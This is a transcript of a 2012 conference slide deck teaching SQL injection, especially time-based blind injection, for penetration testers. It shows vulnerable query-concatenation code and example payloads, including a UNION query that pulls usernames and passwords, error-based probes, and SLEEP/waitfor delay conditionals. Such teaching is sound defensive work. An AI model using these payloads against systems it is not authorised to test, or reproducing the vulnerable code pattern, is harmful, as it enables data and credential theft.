This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment. A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.

1. TIME-BASED BLIND SQL INJECTION
Matt Presson (@matt_presson)
Memphis ISSA
November 2012

2. WHO AM I?
 Sr. Information Security Analyst
 Focus:
 Application
Security
 Database Security
 Mobile Security

3. OBJECTIVE
 Quick introduction to SQL Injection
 Four main types of SQL Injection
 Time-based + Blind
 A likely scenario
 DEMOs

4. INTRO TO SQL INJECTION

5. DEFINITION
“SQL injection is an attack in which malicious code
is inserted into strings that are later passed to [a
database] for parsing and execution.”
“The primary form of SQL injection consists of
direct insertion of code into user-input variables
that are concatenated with SQL commands and
executed.”
Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx

6. SAMPLE VULNERABLE CODE
var _shipCity = Request.form("ShipCity");
var sql = "select * from OrdersTable" +
" where ShipCity = " +
"'" + _shipCity + "'";
Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx

7. CATEGORIES OF SQL INJECTION
 Normal
 UNION queries
 Blind
 Boolean expressions
 Error-based
 Valid syntax that throws exceptions
 Time-based
 Resource intensive or sleep-style queries

8. EXAMPLES – NORMAL INJECTION
var sql = "select ShipCity, Dest from Orders" +
" where ShipCity = '"+_shipCity+"'";
Inject:
' UNION <data you want to extract> -- -
Example:
select ShipCity, Dest from Orders where
ShipCity='' UNION select Username, Password
from Users -- -'

9. EXAMPLES – BLIND INJECTION
var sql = "select * from Orders" +
" where ShipCity = '"+_shipCity+"'";
Inject:
<valid value>' and <positive expression>
<valid value>' and <negative expression>
Example:
select * from Orders where ShipCity='Memphis'
and '1'='1'

10. EXAMPLES – ERROR-BASED INJECTION
var sql = "select * from Orders" +
" where ShipCity = '"+_shipCity+"'";
Example (SQL Server):
select * from Orders where ShipCity='' and
1=CAST(suser_name() as INT)-- -'
Example (MySQL):
select * from Orders where ShipCity='' and
ExtractValue(0,CONCAT(0x5c,(select user())))-- -'

11. EXAMPLES – TIME-BASED INJECTION
var sql = "select ShipCity, Dest from Orders" +
" where ShipCity = '"+_shipCity+"'";
Example (SQL Server):
select ShipCity, Dest from Orders where
ShipCity='' waitfor delay '0:0:10'
Example (MySQL >= 5.0.12):
select ShipCity, Dest from Orders where
ShipCity='' UNION SELECT SLEEP(5), 2'

12. TIME-BASED + BLIND
Same:
 Resource intensive or sleep/wait style
functions
New:
 Extract arbitrary data
 Bypass business functionality

13. EXAMPLES – TIME-BASED + BLIND
var sql = "select ShipCity, Dest from Orders" +
" where ShipCity = '"+_shipCity+"'";
Example (SQL Server):
select ShipCity, Dest from Orders where
ShipCity=''; if(<boolean>) waitfor delay '0:0:10'
Example (MySQL >= 5.0.12):
select ShipCity, Dest from Orders where
ShipCity='' UNION
SELECT IF(<bool>,SLEEP(5),1), '2'

14. SCENARIO

15. DEMOS